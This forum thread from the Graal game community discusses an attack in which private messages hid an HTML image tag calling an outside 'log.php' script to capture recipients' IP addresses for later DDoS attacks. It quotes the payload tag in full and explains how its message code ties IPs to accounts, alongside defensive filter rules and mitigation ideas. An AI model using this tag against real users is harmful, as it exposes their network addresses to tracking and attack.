Graal Forums  

Go Back   Graal Forums > PlayerWorlds > PlayerWorlds Main Forum
FAQ Members List Calendar Today's Posts

Reply
 
Thread Tools Search this Thread Display Modes
  #1  
Old 05-18-2012, 12:05 AM
Emera Emera is offline
Delterian Hybrid
Emera's Avatar
Join Date: Mar 2011
Location: Newcastle Upon-Tyne
Posts: 1,704
Emera is a jewel in the roughEmera is a jewel in the rough
Empty PMs linked to hacking incident.

Players on UN have been receiving empty PM's from various different players. We've done some snooping and found that the PM's aren't actually empty, and contain the following HTML code.

<img src="http://surgecraft.org/log.php?a=#a&b=.jpg>

The fact that the php file is named log isn't very comforting. I don't actually know how to tackle the issue apart other than not open your PM's for the time being, which isn't very practical X_X
Reply With Quote
  #2  
Old 05-18-2012, 12:12 AM
Crono Crono is offline
:pluffy:
Join Date: Feb 2002
Location: Sweden
Posts: 20,000
Crono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond repute
Yeah he DCed my net, at least he said sorry afterwards though.
__________________
Reply With Quote
  #3  
Old 05-18-2012, 12:13 AM
Emera Emera is offline
Delterian Hybrid
Emera's Avatar
Join Date: Mar 2011
Location: Newcastle Upon-Tyne
Posts: 1,704
Emera is a jewel in the roughEmera is a jewel in the rough
:3 This is getting slightly out of hand all of this hacking nonsense.
Reply With Quote
  #4  
Old 05-18-2012, 12:20 AM
fowlplay4 fowlplay4 is offline
team canada
fowlplay4's Avatar
Join Date: Jul 2004
Location: Canada
Posts: 5,200
fowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond repute
Append to wordfilter/rules.txt

PHP Code:
RULE
CHECK pm
MATCH 
<img
PRECISION 100
%
WORDPOSITION part
ACTION replace
RULEEND 
__________________
Quote:
Reply With Quote
  #5  
Old 05-18-2012, 12:22 AM
Bell Bell is offline
Registered User
Bell's Avatar
Join Date: Feb 2007
Posts: 1,824
Bell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud of
I emailed Stefan about it so that maybe he can help with a permanent fix. I agree its extremely annoying.

I swear I used to be able to disable images in pm's in an option but it doesn't seem to be there anymore.
__________________
For support contact
http://support.toonslab.com/
Reply With Quote
  #6  
Old 05-18-2012, 12:27 AM
callimuc callimuc is offline
callimuc's Avatar
Join Date: Nov 2010
Location: Germany
Posts: 1,015
callimuc is a splendid one to beholdcallimuc is a splendid one to beholdcallimuc is a splendid one to beholdcallimuc is a splendid one to beholdcallimuc is a splendid one to behold
Quote:
Originally Posted by Emera View Post
<img src="http://surgecraft.org/log.php?a=#a&b=.jpg>
If its the same code you posted, than Im aondering how many PMs the "hacker" will have to send until he does realize that there is a " missing at the end.
__________________
MEEP!
Reply With Quote
  #7  
Old 05-18-2012, 12:43 AM
Rave_J Rave_J is offline
Graal Developer
Join Date: Feb 2006
Location: Texas
Posts: 848
Rave_J can only hope to improve
Send a message via AIM to Rave_J Send a message via MSN to Rave_J Send a message via Yahoo to Rave_J
Quote:
Originally Posted by callimuc View Post
if its the same code you posted, than im aondering how many pms the "hacker" will have to send until he does realize that there is a " missing at the end.
lol
__________________
Graal Developer
Reply With Quote
  #8  
Old 05-18-2012, 12:48 AM
fowlplay4 fowlplay4 is offline
team canada
fowlplay4's Avatar
Join Date: Jul 2004
Location: Canada
Posts: 5,200
fowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond repute
Quote:
Originally Posted by Bell View Post
I emailed Stefan about it so that maybe he can help with a permanent fix. I agree its extremely annoying.

I swear I used to be able to disable images in pm's in an option but it doesn't seem to be there anymore.
The only way to fix this particular exploit is to have a white-list of image hosts (i.e. imgur, imageshack, or tinypic) for linking images in PMs.

Also the filter I just posted does disable images in pm's.
__________________
Quote:
Reply With Quote
  #9  
Old 05-18-2012, 12:52 AM
Starfire2001 Starfire2001 is offline
Unholy Nation
Starfire2001's Avatar
Join Date: Dec 2010
Location: The streets.
Posts: 156
Starfire2001 will become famous soon enough
Quote:
Originally Posted by fowlplay4 View Post
The only way to fix this particular exploit is to have a white-list of image hosts (i.e. imgur, imageshack, or tinypic) for linking images in PMs.

Also the filter I just posted does disable images in pm's.
Thanks added it, working on server pms but doesn't disable images from global pms. Any way I could do that?
__________________
-Ph8
Reply With Quote
  #10  
Old 05-18-2012, 01:06 AM
ffcmike ffcmike is offline
Banned
Join Date: Jul 2004
Location: London
Posts: 2,029
ffcmike has a reputation beyond reputeffcmike has a reputation beyond reputeffcmike has a reputation beyond reputeffcmike has a reputation beyond reputeffcmike has a reputation beyond reputeffcmike has a reputation beyond reputeffcmike has a reputation beyond reputeffcmike has a reputation beyond repute
Send a message via AIM to ffcmike Send a message via MSN to ffcmike
I & Kevin discovered this weeks ago, thought it was common knowledge due to some incidents on UN which PWA dealt with.
Reply With Quote
  #11  
Old 05-18-2012, 04:59 PM
Bell Bell is offline
Registered User
Bell's Avatar
Join Date: Feb 2007
Posts: 1,824
Bell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud of
Stefan contacted me and put a filter in for it and is going to see if he can resolve the issue within the client but could not get it to crash the v6 client at all. Are any of you who actually have the problem using v6? He suggests everyone update their version.
__________________
For support contact
http://support.toonslab.com/
Reply With Quote
  #12  
Old 05-18-2012, 05:05 PM
Emera Emera is offline
Delterian Hybrid
Emera's Avatar
Join Date: Mar 2011
Location: Newcastle Upon-Tyne
Posts: 1,704
Emera is a jewel in the roughEmera is a jewel in the rough
Fantastic, thank you.
Reply With Quote
  #13  
Old 05-18-2012, 05:05 PM
fowlplay4 fowlplay4 is offline
team canada
fowlplay4's Avatar
Join Date: Jul 2004
Location: Canada
Posts: 5,200
fowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond repute
Quote:
Originally Posted by Bell View Post
Stefan contacted me and put a filter in for it and is going to see if he can resolve the issue within the client but could not get it to crash the v6 client at all. Are any of you who actually have the problem using v6? He suggests everyone update their version.
This isn't about a crash at all, it's just linking an image and logging their IP Addresses. The attacker then DDoS'd the IPs.
__________________
Quote:
Reply With Quote
  #14  
Old 05-18-2012, 05:07 PM
Bell Bell is offline
Registered User
Bell's Avatar
Join Date: Feb 2007
Posts: 1,824
Bell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud of
Thanks fp
__________________
For support contact
http://support.toonslab.com/
Reply With Quote
  #15  
Old 05-18-2012, 11:14 PM
Crono Crono is offline
:pluffy:
Join Date: Feb 2002
Location: Sweden
Posts: 20,000
Crono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond repute
Quote:
Originally Posted by Bell View Post
He suggests everyone update their version.
never!!
__________________
Reply With Quote
  #16  
Old 05-19-2012, 08:39 PM
Bell Bell is offline
Registered User
Bell's Avatar
Join Date: Feb 2007
Posts: 1,824
Bell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud of
Disabling images in pm's then is really the only other option to protect everyone. Stefan has asked and I've advised its the best course of action unless we can reenable the option to turn imaging on and off in pm's.
__________________
For support contact
http://support.toonslab.com/
Reply With Quote
  #17  
Old 05-19-2012, 09:09 PM
linkrulz4 linkrulz4 is offline
A decade of fun~ 'w'
linkrulz4's Avatar
Join Date: Sep 2002
Location: erectin a dispenser
Posts: 25
linkrulz4 is on a distinguished road
Send a message via AIM to linkrulz4
To disable html in PM's the old fashioned way, please do the following procedure:
close graal before doing anything
1) go into your Graal folder.
2) find control2config.txt
3)locate the line nohtmlinpms=false
4) change the value to true.
5) save and exit
7)start up graal
8)be sure to check the txt file after graal loads to see if it changed back or not


Disregard this post. That's for RC.
__________________
sanvich?

Last edited by linkrulz4; 05-19-2012 at 09:57 PM..
Reply With Quote
  #18  
Old 05-19-2012, 09:12 PM
Crow Crow is offline
ǝɔɐɹq ʎןɹnɔ
Crow's Avatar
Join Date: Dec 2006
Location: Germany
Posts: 5,153
Crow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond repute
Quote:
Originally Posted by linkrulz4 View Post
To disable html in PM's the old fashioned way, please do the following procedure:
close graal before doing anything
1) go into your Graal folder.
2) find control2config.txt
3)locate the line nohtmlinpms=false
4) change the value to true.
5) save and exit
7)start up graal
8)be sure to check the txt file after graal loads to see if it changed back or not
That's the config file for RC. It does not apply to the client at all.
Reply With Quote
  #19  
Old 05-19-2012, 09:37 PM
linkrulz4 linkrulz4 is offline
A decade of fun~ 'w'
linkrulz4's Avatar
Join Date: Sep 2002
Location: erectin a dispenser
Posts: 25
linkrulz4 is on a distinguished road
Send a message via AIM to linkrulz4
Quote:
Originally Posted by Crow View Post
That's the config file for RC. It does not apply to the client at all.
Ah, I see.

In that case, where is the command to shut off this located, perhaps?
"File download: http://pics.fort90.com/cdi_link.gif (size: 43364) done"

On a side note, putting:
nohtmlinpms=true
nohtmlimages=true
into the game_config did alter the way images were presented, just a tad. Doesn't stop them from loading, though.
__________________
sanvich?
Reply With Quote
  #20  
Old 05-19-2012, 09:40 PM
Crow Crow is offline
ǝɔɐɹq ʎןɹnɔ
Crow's Avatar
Join Date: Dec 2006
Location: Germany
Posts: 5,153
Crow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond repute
As far as I'm aware, it's not possible to completely disable HTML in PMs anymore.
Reply With Quote
  #21  
Old 05-19-2012, 09:42 PM
linkrulz4 linkrulz4 is offline
A decade of fun~ 'w'
linkrulz4's Avatar
Join Date: Sep 2002
Location: erectin a dispenser
Posts: 25
linkrulz4 is on a distinguished road
Send a message via AIM to linkrulz4
Quote:
Originally Posted by Crow View Post
As far as I'm aware, it's not possible to completely disable HTML in PMs anymore.
That seems rather faulty. There has to be a way, somewhere.
I swore in the old versions of the game there was an option for it. Has anyone tried applying that to the current v6?

Also, when I look in the PO gui files there seems to have been an attempt to insert a switch (at least the text for one) into the GUI to turn off html in pms.
I can't find it anywhere in the actual GUI though.
__________________
sanvich?
Reply With Quote
  #22  
Old 05-19-2012, 09:43 PM
Crow Crow is offline
ǝɔɐɹq ʎןɹnɔ
Crow's Avatar
Join Date: Dec 2006
Location: Germany
Posts: 5,153
Crow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond repute
There was, but it's not the same anymore. Current HTML parsing is done in GS2's GUI system.
Reply With Quote
  #23  
Old 05-19-2012, 09:56 PM
linkrulz4 linkrulz4 is offline
A decade of fun~ 'w'
linkrulz4's Avatar
Join Date: Sep 2002
Location: erectin a dispenser
Posts: 25
linkrulz4 is on a distinguished road
Send a message via AIM to linkrulz4
Quote:
Originally Posted by Crow View Post
There was, but it's not the same anymore. Current HTML parsing is done in GS2's GUI system.
Well, I'm stumped then!
__________________
sanvich?
Reply With Quote
  #24  
Old 05-20-2012, 03:55 PM
skillmaster19 skillmaster19 is offline
Registered User
Join Date: Oct 2010
Posts: 392
skillmaster19 will become famous soon enough
Should probably censor some of the html code so someone else doesn't start doing it too.
Reply With Quote
  #25  
Old 05-20-2012, 04:30 PM
cbk1994 cbk1994 is offline
the fake one
cbk1994's Avatar
Join Date: Mar 2003
Location: San Francisco
Posts: 10,718
cbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond repute
Send a message via AIM to cbk1994
Quote:
Originally Posted by skillmaster19 View Post
Should probably censor some of the html code so someone else doesn't start doing it too.
I would rather just see a whitelist of image hosts (including u.graalcenter.org !!). Message codes should be disabled as well. Stuff like "#1" is just annoying, while "#a" in HTML can be a real problem (since it lets you easily map IPs -> accounts).
__________________
Reply With Quote
  #26  
Old 05-20-2012, 09:14 PM
Tigairius Tigairius is offline
The Cat
Tigairius's Avatar
Join Date: Jan 2007
Location: Missouri, USA
Posts: 4,240
Tigairius has a brilliant futureTigairius has a brilliant futureTigairius has a brilliant futureTigairius has a brilliant futureTigairius has a brilliant futureTigairius has a brilliant futureTigairius has a brilliant futureTigairius has a brilliant future
I vehemently disagree with the idea of disabling displaying images in PMs. I do agree with the idea of getting rid of #a, etc. though.

Having HTML and allowing images to be displayed opens up so much customization in PMs for players. I see players using it all the time to advertise items they're selling on Era and other servers by showing the item's icon and stuff.

Players could possibly have the option to disable the <img> tag linking to external sources maybe (that would mean if you tried to display an image that exists on the server it would still work, so players could link to item icons, etc), but leave HTML alone.

I do not want to see images being removed from PMs though.
__________________


“Shoot for the moon. Even if you miss, you'll land among the stars.”
Reply With Quote
  #27  
Old 05-20-2012, 09:30 PM
Crono Crono is offline
:pluffy:
Join Date: Feb 2002
Location: Sweden
Posts: 20,000
Crono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond repute
era must have some creative folk because i've never seen it used on zodiac or era. i like chris' whitelist idea.
__________________
Reply With Quote
  #28  
Old 05-20-2012, 10:03 PM
cbk1994 cbk1994 is offline
the fake one
cbk1994's Avatar
Join Date: Mar 2003
Location: San Francisco
Posts: 10,718
cbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond reputecbk1994 has a reputation beyond repute
Send a message via AIM to cbk1994
Quote:
Originally Posted by Crono View Post
era must have some creative folk because i've never seen it used on zodiac or era. i like chris' whitelist idea.
It is used a lot in masses. Mostly I find it annoying, but I too wouldn't like to see it disabled entirely. 6,436 uses in masses since September 2011. Stuff like...







(just a few off the top)
__________________
Reply With Quote
  #29  
Old 05-20-2012, 11:44 PM
Hezzy002 Hezzy002 is offline
Registered User
Join Date: Jul 2011
Posts: 247
Hezzy002 is a jewel in the roughHezzy002 is a jewel in the rough
The solution is obviously to download images to the game server as a proxy and then send them to the client.
Reply With Quote
  #30  
Old 05-20-2012, 11:56 PM
Crow Crow is offline
ǝɔɐɹq ʎןɹnɔ
Crow's Avatar
Join Date: Dec 2006
Location: Germany
Posts: 5,153
Crow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond reputeCrow has a reputation beyond repute
Quote:
Originally Posted by Hezzy002 View Post
The solution is obviously to download images to the game server as a proxy and then send them to the client.
Indeed. It's the only logical approach to this problem.
Reply With Quote
  #31  
Old 05-20-2012, 11:57 PM
Fulg0reSama Fulg0reSama is offline
Extrinsical Anomaly
Fulg0reSama's Avatar
Join Date: Sep 2009
Location: Ohio
Posts: 3,049
Fulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant future
Quote:
Originally Posted by cbk1994 View Post






(just a few off the top)
Some of these are more diverting my attention away than towards their advertisements.
__________________

Careful, thoughts and opinions here scare people.
Reply With Quote
  #32  
Old 05-21-2012, 05:29 AM
Crono Crono is offline
:pluffy:
Join Date: Feb 2002
Location: Sweden
Posts: 20,000
Crono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond repute
Quote:
Originally Posted by cbk1994 View Post
It is used a lot in masses. Mostly I find it annoying, but I too wouldn't like to see it disabled entirely. 6,436 uses in masses since September 2011. Stuff like...
like i said, era folk must be creative because it's never seen on zod or un
__________________
Reply With Quote
  #33  
Old 05-21-2012, 06:17 AM
Crono Crono is offline
:pluffy:
Join Date: Feb 2002
Location: Sweden
Posts: 20,000
Crono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond reputeCrono has a reputation beyond repute
Being the kind person I am, I casually contacted the person doing this and he said that he has ceased the attacks.
__________________
Reply With Quote
  #34  
Old 05-21-2012, 06:03 PM
Bell Bell is offline
Registered User
Bell's Avatar
Join Date: Feb 2007
Posts: 1,824
Bell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud ofBell has much to be proud of
Quote:
Originally Posted by Tigairius View Post

I do not want to see images being removed from PMs though.
Putting it in bold certainly lets us know your opinion of it, lol. I don't like the idea of having to remove images either but this has become a serious problem with Graalians from all servers affected. Yes, some servers have put in filters and yes, Stefan has added key words to the main filters but we all know that only lasts so long.

Personally my first choice is to make imaging an option again, then you could add all the filters you wanted but at least you would have the option of shutting them off until such time as a new filter could be added. That option is up to Stefan though, I don't and didn't know if its a possible solution to the problem. Hopefully it is.
__________________
For support contact
http://support.toonslab.com/
Reply With Quote
  #35  
Old 05-21-2012, 06:32 PM
DustyPorViva DustyPorViva is offline
Will work for food. Maybe
DustyPorViva's Avatar
Join Date: Sep 2003
Location: Maryland, USA
Posts: 9,589
DustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond repute
Send a message via AIM to DustyPorViva Send a message via MSN to DustyPorViva
Disable php format from being used as an image?
Reply With Quote
  #36  
Old 05-21-2012, 06:32 PM
Fulg0reSama Fulg0reSama is offline
Extrinsical Anomaly
Fulg0reSama's Avatar
Join Date: Sep 2009
Location: Ohio
Posts: 3,049
Fulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant future
Quote:
Originally Posted by DustyPorViva View Post
Disable php format from being used as an image?
I like this idea personally.
__________________

Careful, thoughts and opinions here scare people.
Reply With Quote
  #37  
Old 05-21-2012, 06:35 PM
nightslayer317 nightslayer317 is offline
Registered User
Join Date: Nov 2003
Location: Graal
Posts: 73
nightslayer317 will become famous soon enough
Quote:
Originally Posted by Bell View Post
Putting it in bold certainly lets us know your opinion of it, lol. I don't like the idea of having to remove images either but this has become a serious problem with Graalians from all servers affected. Yes, some servers have put in filters and yes, Stefan has added key words to the main filters but we all know that only lasts so long.

Personally my first choice is to make imaging an option again, then you could add all the filters you wanted but at least you would have the option of shutting them off until such time as a new filter could be added. That option is up to Stefan though, I don't and didn't know if its a possible solution to the problem. Hopefully it is.
I hope he fully disables HTML. Many a times players have reported pornographic and visually disturbing images PMed to them via mass or private message. The item selling ads are creative and fun but the images of men or females bending over and exposing themselves is not suitable or relevant to the game. At least I don't think they are.
Reply With Quote
  #38  
Old 05-21-2012, 06:43 PM
DustyPorViva DustyPorViva is offline
Will work for food. Maybe
DustyPorViva's Avatar
Join Date: Sep 2003
Location: Maryland, USA
Posts: 9,589
DustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond reputeDustyPorViva has a reputation beyond repute
Send a message via AIM to DustyPorViva Send a message via MSN to DustyPorViva
Quote:
Originally Posted by nightslayer317 View Post
I hope he fully disables HTML. Many a times players have reported pornographic and visually disturbing images PMed to them via mass or private message. The item selling ads are creative and fun but the images of men or females bending over and exposing themselves is not suitable or relevant to the game. At least I don't think they are.
Welcome to the internet, where **** happens.
Reply With Quote
  #39  
Old 05-21-2012, 06:45 PM
Fulg0reSama Fulg0reSama is offline
Extrinsical Anomaly
Fulg0reSama's Avatar
Join Date: Sep 2009
Location: Ohio
Posts: 3,049
Fulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant futureFulg0reSama has a brilliant future
Quote:
Originally Posted by DustyPorViva View Post
Welcome to the internet, where **** happens.
Only If I hadn't given rep yesterday :C
__________________

Careful, thoughts and opinions here scare people.
Reply With Quote
  #40  
Old 05-21-2012, 06:45 PM
fowlplay4 fowlplay4 is offline
team canada
fowlplay4's Avatar
Join Date: Jul 2004
Location: Canada
Posts: 5,200
fowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond reputefowlplay4 has a reputation beyond repute
Quote:
Originally Posted by DustyPorViva View Post
Disable php format from being used as an image?
It's not that simple, you can log image requests in general. I.e. In Rails:

Started GET "/test_fowlplay4.png" for 127.0.0.1 at 2012-05-21 09:43:46 -0700

I still think the best option will be a white-list of approved image hosts, and then an player-list option to disable the rendering of external images in PMs.

Unless Stefan can script it into the PM system we'll likely need a client update (we're way overdue already).
__________________
Quote:
Reply With Quote
Reply


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT +2. The time now is 02:36 AM.


Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2026, vBulletin Solutions Inc.
Copyright (C) 1998-2019 Toonslab All Rights Reserved.